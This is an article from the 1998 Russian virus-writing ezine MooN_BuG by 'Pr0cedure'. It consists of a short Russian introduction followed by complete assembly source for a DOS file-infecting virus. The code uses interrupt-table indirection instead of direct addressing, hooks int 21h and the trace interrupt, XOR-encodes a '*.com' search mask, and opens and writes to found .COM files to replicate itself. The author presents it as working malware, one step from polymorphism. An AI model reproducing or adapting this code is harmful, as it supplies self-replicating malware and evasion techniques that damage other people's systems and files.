[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 8, Nov 1998 file 006
Вирус без адресации (A-MORPH)
by Pr0cedure
Ниже приведен пример простенького тривиала, в котором я постарался
избежать прямой адрессации. До полиморфизма, причем довольно интересного, там
всего лишь один шаг. Но этот шаг я не сделал из-за собственной лени. По моему
и так все красиво получилось.
; (c) Pr0cedure http://www.chat.ru/~anyfiler
Model Tiny
.386
.code
org 100h
faArchive equ 020h
IntDate equ 03h
Interrupt equ 01h
TestFile equ 02h
MyLength equ 03h
NotFileFound equ 04h
RetStep equ 05h
BegStep equ 06h
RetStep1 equ 07h
BegStep1 equ 08h
Int21 equ 09h
MyRet equ 0ah
start:
mov ah,77h
xchg al,ah
lbl0:
in al,40h
cmp al,77h
jne lbl0
xchg al,ah
mov ah,0bbh
int 15h
sub ax,8500h
add ax,lbl2
push ax
ret
lbl1 equ $-start + 100h
dw Tabelle_Ofs
;***
MyIntOfs equ $-start + 100h
push ax
push di
shl si,1
mov ax,word ptr ds:[lbl1]
inc ah
mov di,ax
add di,si
mov ax,word ptr ds:[di]
inc ah
xchg si,ax
pop di
pop ax
iret
;***
IntOfs equ $-start + 100h
xchg di,si
mov si,MyRet
int IntDate
push si
xchg di,si
mov di,word ptr ds:[si+2]
mov word ptr ds:[si+2],0c3c3h
push si
ret
Ofs_0a equ $-start
mov word ptr ds:[si+2],di
iret
;***
lbl2 equ $-start
mov ah,25h
mov al,IntDate
mov dx,MyIntOfs
Ofs_09 equ $-start
int 21h
mov ax,2501h
mov dx,IntOfs
int 21h
mov si,RetStep
int IntDate
xchg dx,si
mov ax,2500h
mov si,Int21
int IntDate
int 01h
mov si,MyLength
int IntDate
mov byte ptr ds:[si],2
FindFirst:
mov si,CMASK
int IntDate
mov dx,si
mov cx,5
Ofs_06 equ $-start
mov al, byte ptr ds:[si]
xor al,0aah
mov byte ptr ds:[si],al
inc si
dec cx
mov ax,cx
shl ax,1
div cl
xchg si,di
mov si,BegStep
int IntDate
xchg si,di
push di
ret
Ofs_05 equ $-start
pop ax
pop ax
pop ax
mov ah,4eh + 11h
mov cx,faArchive
sub ah,12h
inc ah
Ofs_01 equ $-start
mov si,Int21
int IntDate
int 01h
push ax
mov si,RetStep1
int IntDate
xchg dx,si
mov ax,2500h
mov si,Int21
int IntDate
int 01h
mov si,MyLength
int IntDate
xor cx,cx
mov cl,byte ptr ds:[si]
mov ax,cx
shl ax,1
div cl
mov si,MyLength
int IntDate
mov byte ptr ds:[si],0
mov si,CMASK
int IntDate
mov cx,5
Ofs_08 equ $-start
mov al, byte ptr ds:[si]
xor al,0aah
mov byte ptr ds:[si],al
inc si
dec cx
mov ax,cx
shl ax,1
div cl
xchg si,di
mov si,BegStep1
int IntDate
xchg si,di
push di
ret
Ofs_07 equ $-start
pop ax
pop ax
pop ax
pop ax
mov si,NotFileFound
int IntDate
mov cx,word ptr ds:[si]
add cx,ax
mov word ptr ds:[si],cx
Ofs_04 equ $-start
db 0c3h - 12h
db 90h
mov si,TestFile
int IntDate
push si
ret
;---
Ofs_02 equ $-start
mov ax,0ffffh - 3d02h
mov dx,9eh
xchg ax,cx
mov ax,0ffffh
sub ax,cx
mov si,Int21
int IntDate
int 01h
xchg ax,bx
mov si,MyLength
int IntDate
xchg cx,si
dec ch
mov dx,100h
push bx cx dx
mov ax,3521h
mov si,Int21
int IntDate
int 01h
push es
pop ds
push bx
pop dx
mov ax,2500h
int 21h
push cs
pop ds
push cs
pop es
mov ah,57h - 40h
xchg ax,cx
mov ah,57h
sub ah,ch
pop dx cx bx
int 00h
mov ah,3fh
mov si,Int21
dec ah
int IntDate
int 01h
mov si,Interrupt
int IntDate
mov ah,4dh
push si
add ah,2
ret
;****
CMASK equ 00h
Ofs_00 equ $-start
db '*' xor 0aah, '.' xor 0aah, 'c' xor 0aah, 'o' xor 0aah, 'm' xor 0aah, 0
Tabelle_Ofs equ $-start
dw Ofs_00, Ofs_01, Ofs_02, Ofs_03, Ofs_04, Ofs_05, Ofs_06, Ofs_07, Ofs_08, Ofs_09, Ofs_0a
Ofs_03 equ $-start
db ?
end start
